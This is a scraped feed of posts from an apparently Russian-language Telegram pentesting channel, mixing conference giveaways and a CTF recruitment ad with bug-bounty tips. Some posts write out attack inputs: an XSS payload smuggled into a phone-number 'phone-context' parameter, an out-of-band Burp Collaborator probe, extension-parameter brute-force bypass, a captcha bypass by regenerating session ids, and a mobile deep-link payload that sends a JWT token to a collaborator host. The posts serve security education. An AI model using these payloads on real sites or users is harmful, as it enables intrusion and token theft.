Привет друзья! Я думаю многие знают про конференцию OFFZONE, так вот...
Тут наметился конкурс бесплатной проходки на OFFZONE c поддержкой от платформы BI.ZONE Bug Bounty для вас, подписчиков канала Что-то на пентестерском
Конференция пройдет 24-25 августа в Москве
Далее закину номера в рандомайзер и возможно билет достанется именно тебе, мой дорогой читатель 😉
ЧТНП | #конкурс
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍1
Всем привет! Решил переписать своё старое исследование в более читабельный формат.
Еще давно, у меня был проект на пентест - сайт на 1с-битрикс
В ходе поиска уязвимостей мне попалась капча в стандартной форме аутентификации 1с-битрикс, которая генерировалось вроде бы стандартно
Но я решил её поисследовать и пойти нестандартным путем
Вот что из этого вышло...
Мне пришло в голову проверить генерацию sid, после того, как обнаружил что sid долгое время оставался живой и не удалялся
Лежал он живой около 4 часов, и подумал я, что если в этот временной промежуток сделать проверку на генерацию одинаковых сидов
Если сгенерируется тот же сид, что и живой, то его можно вставить в запрос и обойти капчу, тк и значение и sid значения мы знаем
Тогда и попробовал сделать скрипт с POST запросом через форму аутентификации
И это сработало...
Также можно сгенерировать к примеру 10 сидов, что ускорит обход капчи
ЧТНП | #исследования #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👎3👍2🤯1
⚔️ Заряжайся адреналином и присоединяйся к команде атакующих!
Участвуй во Всероссийской студенческой кибербитве и сражайся за приз в 100 000 рублей! 😎
Innostage ищет ребят, которые будут взламывать объекты инфраструктуры коммерческих предприятий и государственных структур на базе учебного виртуального киберполигона Innostage.
Присоединяйся, если ты:
✔️ студент российского вуза
✔️ имеешь опыт CTF-соревнований
✔️ можешь собрать свою команду или уже в ней состоишь
✔️ хочешь проверить свои силы в условиях, максимально приближенных к реальности
Тебе предстоит сразиться со студентами, которые прошли подготовку в условиях настоящего SOC!
Готов принять их вызов? Тогда переходи по ссылке и регистрируйся. Прием заявок до 19 августа.
Участвуй во Всероссийской студенческой кибербитве и сражайся за приз в 100 000 рублей! 😎
Innostage ищет ребят, которые будут взламывать объекты инфраструктуры коммерческих предприятий и государственных структур на базе учебного виртуального киберполигона Innostage.
Присоединяйся, если ты:
✔️ студент российского вуза
✔️ имеешь опыт CTF-соревнований
✔️ можешь собрать свою команду или уже в ней состоишь
✔️ хочешь проверить свои силы в условиях, максимально приближенных к реальности
Тебе предстоит сразиться со студентами, которые прошли подготовку в условиях настоящего SOC!
Готов принять их вызов? Тогда переходи по ссылке и регистрируйся. Прием заявок до 19 августа.
🔥10👍2
Всё просто. От вас требуется:
Ровно в 00:00 по МСК времени 15 числа опубликуем победителя 😎
ЧТНП | #конкурс
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍1
Что-то на пентестерском
И так, все готовы?)
Нас 42 участника
Нас 42 участника
🔥2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18
Данное руководство позволит тебе начать свой путь в мир баг баунти и веб пентеста, закрыть пробелы в знаниях и темах
Пошагово даёт понимание что изучать и на каком этапе, собраны еще и ресурсы где могут обучить хантить бесплатно. Happy hacking 😉
ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤3👍3👏1
Поход на OFFZONE получился приятным и хорошим.
Организаторы смогли передать атмосферу а-ля хакерской тусовки, а стенды компаний придумали веселые квесты и неожиданные плюшки для комьюнити багхантеров/пентестеров.
К тому же был еще и бесплатный кальян, а Positive Tech угощали фирменным пивом и всё это на крыше, откуда открывается красивый вид на тусовку снизу под музыку жанра техно
И это еще не всё..
Тем, кто не был - увидимся в следующем году
Happy hacking
ЧТНП | #блабла
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17❤4
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13✍2
Привет! Давай разберемся как найти уязвимости в форме ввода телефона.
Согласно RFC 5341 URI номера телефона может иметь параметры, которые нужны для передачи более точных данных
Чаще всего параметры принимают почтовые сервисы либо веб-приложения в которых отсутствует жесткая валидация номеров.
+88005553535;phone-context=<script>alert(1)</script>
// Следует поставить в query string параметр в который помещен номер+88005553535;phone-context=burpcollab
// Работает редко, в основном в старых системах+88005553535;ext=0 +88005553535;ext=2 +88005553535;ext=3
// Если заблокировали то подставляем ext с цифрой и продолжаем брутить с того кода, с которого залочили ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍3❤2
Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал что существуют разные ID
Так вот, в данном видео рассказывается как предсказывать идентификаторы а также разбираются отчеты с bug bounty где рассказывается как баг хантеры смогли предсказать ID и получить IDOR
Happy hacking 😉
ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16
Forwarded from Похек (Sergey Zybnev)
DDoS-защиту Cloudflare можно обойти с помощью самой Cloudflare
Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare.
#xakep #cloudflare
💬 Канал | 📡 Хакер | ➡️ Более подробная информация
Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare.
#xakep #cloudflare
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯12👍4
Привет! Сегодня познакомимся с уязвимостями deep link'ов в мобильных приложениях и узнаем как найти в них уязвимости
По сути дип линк нужен для координации или перенаправления в те или иные части мобильного приложения
Нужно это для удобства, ты можешь легко переключаться между приложениями или переходить с веб-сайта на приложение без переключения на само мобильное приложение
У каждого приложения свой дип линк и выглядит примерно так:
Уязвимости возникают за счет неправильной обработки параметров из дип линков
Уязвимости могут быть разные в зависимости от того, что за параметр перед вами
Коллега на работе нашел уязвимость CSRF, данная уязвимость позволяла присылать JWT токен на burp collaborator
<a href="keklol://url=https://burp_collab">click</a>
В целом на этом всё, импакт от этого может быть разный, в зависимости от того, что ты получаешь в ответ, если это RCE то критический, если присылаются пользовательские данные - высокий
Если можно заставить пользователя подписаться на какие-то каналы - низкий
Happy hacking
ЧТНП | #mobile
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥4❤3
Forwarded from Information Security Memes
This media is not supported in your browser
VIEW IN TELEGRAM
😁31👍1